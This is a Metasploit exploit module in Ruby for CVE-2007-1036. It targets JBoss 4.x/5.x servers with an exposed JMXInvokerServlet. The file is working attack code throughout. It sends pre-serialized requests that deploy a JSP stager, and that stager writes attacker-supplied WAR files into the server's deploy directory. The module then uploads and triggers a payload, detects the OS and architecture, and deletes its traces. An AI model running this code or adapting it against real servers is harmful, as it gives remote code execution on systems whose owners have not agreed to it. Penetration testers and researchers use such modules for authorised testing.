346 lines
9.4 KiB
Ruby
346 lines
9.4 KiB
Ruby
require 'msf/core'
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class Metasploit4 < Msf::Exploit::Remote
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Rank = ExcellentRanking
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HttpFingerprint = { :pattern => [ /JBoss/ ] }
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include Msf::Exploit::Remote::HttpClient
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include Msf::Exploit::EXE
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
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'Description' => %q{
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This module can be used to execute a payload on JBoss servers that have an
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exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
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the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
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to finally upload the selected payload to the target. The DeploymentFileRepository
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methods are only available on Jboss 4.x and 5.x.
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},
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'Author' => [
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'Patrick Hof', # Vulnerability discovery, analysis and PoC
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'Jens Liebchen', # Vulnerability discovery, analysis and PoC
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'h0ng10' # Metasploit module
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],
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'License' => MSF_LICENSE,
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'References' =>
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[
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[ 'CVE', '2007-1036' ],
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[ 'OSVDB', '33744' ],
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[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
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],
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'DisclosureDate' => 'Feb 20 2007',
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'Privileged' => true,
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'Platform' => ['java', 'win', 'linux' ],
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'Stance' => Msf::Exploit::Stance::Aggressive,
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'Targets' =>
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[
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# do target detection but java meter by default
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[ 'Automatic',
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{
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'Arch' => ARCH_JAVA,
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'Platform' => 'java'
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}
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],
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[ 'Java Universal',
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{
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'Arch' => ARCH_JAVA,
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},
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],
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#
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# Platform specific targets
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#
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[ 'Windows Universal',
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{
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'Arch' => ARCH_X86,
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'Platform' => 'win'
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},
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],
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[ 'Linux x86',
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{
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'Arch' => ARCH_X86,
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'Platform' => 'linux'
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},
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],
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],
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'DefaultTarget' => 0))
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register_options(
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[
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Opt::RPORT(8080),
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OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
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OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
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OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),
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], self.class)
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end
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def check
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res = send_serialized_request('version.bin')
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if (res.nil?) or (res.code != 200)
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print_error("Unable to request version, returned http code is: #{res.code.to_s}")
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return Exploit::CheckCode::Unknown
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end
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# Check if the version is supported by this exploit
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return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/
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return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/
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return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/
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if res.body =~ /ServletException/ # Simple check, if we caused an exception.
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print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
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return Exploit::CheckCode::Appears
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end
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return Exploit::CheckCode::Safe
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end
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def exploit
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mytarget = target
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if (target.name =~ /Automatic/)
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mytarget = auto_target
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fail_with("Unable to automatically select a target") if not mytarget
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print_status("Automatically selected target: \"#{mytarget.name}\"")
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else
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print_status("Using manually select target: \"#{mytarget.name}\"")
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end
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# We use a already serialized stager to deploy the final payload
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regex_stager_app_base = rand_text_alpha(14)
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regex_stager_jsp_name = rand_text_alpha(14)
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name_parameter = rand_text_alpha(8)
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content_parameter = rand_text_alpha(8)
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stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"
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stager_code = "A" * 810 # 810 is the size of the stager in the serialized request
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replace_values = {
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'regex_app_base' => regex_stager_app_base,
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'regex_jsp_name' => regex_stager_jsp_name,
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stager_code => generate_stager(name_parameter, content_parameter)
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}
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print_status("Deploying stager")
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send_serialized_request('installstager.bin', replace_values)
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print_status("Calling stager: #{stager_uri}")
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call_uri_mtimes(stager_uri, 5, 'GET')
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# Generate the WAR with the payload which will be uploaded through the stager
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app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
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jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
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war_data = payload.encoded_war({
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:app_name => app_base,
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:jsp_name => jsp_name,
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:arch => mytarget.arch,
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:platform => mytarget.platform
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}).to_s
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b64_war = Rex::Text.encode_base64(war_data)
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print_status("Uploading payload through stager")
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res = send_request_cgi({
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'uri' => stager_uri,
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'method' => "POST",
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'vars_post' =>
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{
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name_parameter => app_base,
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content_parameter => b64_war
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}
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}, 20)
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payload_uri = "/#{app_base}/#{jsp_name}.jsp"
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print_status("Calling payload: " + payload_uri)
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res = call_uri_mtimes(payload_uri,5, 'GET')
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# Remove the payload through stager
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print_status("Removing payload through stager")
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delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
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res = send_request_cgi(
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{'uri' => delete_payload_uri,
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})
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# Remove the stager
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print_status("Removing stager")
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send_serialized_request('removestagerfile.bin', replace_values)
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send_serialized_request('removestagerdirectory.bin', replace_values)
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handler
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end
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def generate_stager(name_param, content_param)
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war_file = rand_text_alpha(4+rand(4))
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file_content = rand_text_alpha(4+rand(4))
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jboss_home = rand_text_alpha(4+rand(4))
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decoded_content = rand_text_alpha(4+rand(4))
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path = rand_text_alpha(4+rand(4))
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fos = rand_text_alpha(4+rand(4))
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name = rand_text_alpha(4+rand(4))
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file = rand_text_alpha(4+rand(4))
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stager_script = <<-EOT
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<%@page import="java.io.*,
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java.util.*,
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sun.misc.BASE64Decoder"
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%>
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<%
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String #{file_content} = "";
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String #{war_file} = "";
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String #{jboss_home} = System.getProperty("jboss.server.home.dir");
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if (request.getParameter("#{content_param}") != null){
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try {
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#{file_content} = request.getParameter("#{content_param}");
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#{war_file} = request.getParameter("#{name_param}");
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byte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});
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String #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";
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FileOutputStream #{fos} = new FileOutputStream(#{path});
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#{fos}.write(#{decoded_content});
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#{fos}.close();
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}
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catch(Exception e) {}
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}
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else {
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try{
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String #{name} = request.getParameter("#{name_param}");
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String #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";
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new File(#{file}).delete();
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}
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catch(Exception e) {}
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}
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%>
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EOT
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# The script must be exactly 810 characters long, otherwise we might have serialization issues
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# Therefore we fill the rest wit spaces
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spaces = " " * (810 - stager_script.length)
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stager_script << spaces
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end
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def send_serialized_request(file_name , replace_params = {})
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path = File.join( Msf::Config.install_root, "data", "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
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data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
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replace_params.each { |key, value| data.gsub!(key, value) }
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res = send_request_cgi({
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'uri' => target_uri.path,
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'method' => 'POST',
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'data' => data,
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'headers' =>
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{
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'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',
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'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'
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}
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}, 25)
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if (not res) or (res.code != 200)
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print_error("Failed: Error requesting preserialized request #{file_name}")
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return nil
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end
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res
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end
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def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)
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# JBoss might need some time for the deployment. Try 5 times at most and
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# wait 5 seconds inbetween tries
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num_attempts.times do |attempt|
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if (verb == "POST")
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res = send_request_cgi(
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{
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'uri' => uri,
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'method' => verb,
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'data' => data
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}, 5)
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else
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uri += "?#{data}" unless data.nil?
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res = send_request_cgi(
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{
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'uri' => uri,
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'method' => verb
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}, 30)
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end
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msg = nil
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if (!res)
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msg = "Execution failed on #{uri} [No Response]"
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elsif (res.code < 200 or res.code >= 300)
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msg = "http request failed to #{uri} [#{res.code}]"
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elsif (res.code == 200)
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print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
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return res
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end
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if (attempt < num_attempts - 1)
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msg << ", retrying in 5 seconds..."
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print_status(msg) if datastore['VERBOSE']
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select(nil, nil, nil, 5)
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else
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print_error(msg)
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return res
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end
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end
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end
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def auto_target
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print_status("Attempting to automatically select a target")
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plat = detect_platform()
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arch = detect_architecture()
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return nil if (not arch or not plat)
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# see if we have a match
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targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
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# no matching target found
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return nil
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end
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# Try to autodetect the target platform
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def detect_platform
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print_status("Attempting to automatically detect the platform")
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res = send_serialized_request("osname.bin")
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if (res.body =~ /(Linux|FreeBSD|Windows)/i)
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os = $1
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if (os =~ /Linux/i)
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return 'linux'
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elsif (os =~ /FreeBSD/i)
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return 'linux'
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elsif (os =~ /Windows/i)
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return 'win'
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end
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end
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nil
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end
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# Try to autodetect the architecture
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def detect_architecture()
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print_status("Attempting to automatically detect the architecture")
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res = send_serialized_request("osarch.bin")
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if (res.body =~ /(i386|x86)/i)
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arch = $1
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if (arch =~ /i386|x86/i)
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return ARCH_X86
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# TODO, more
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end
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end
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nil
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end
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end
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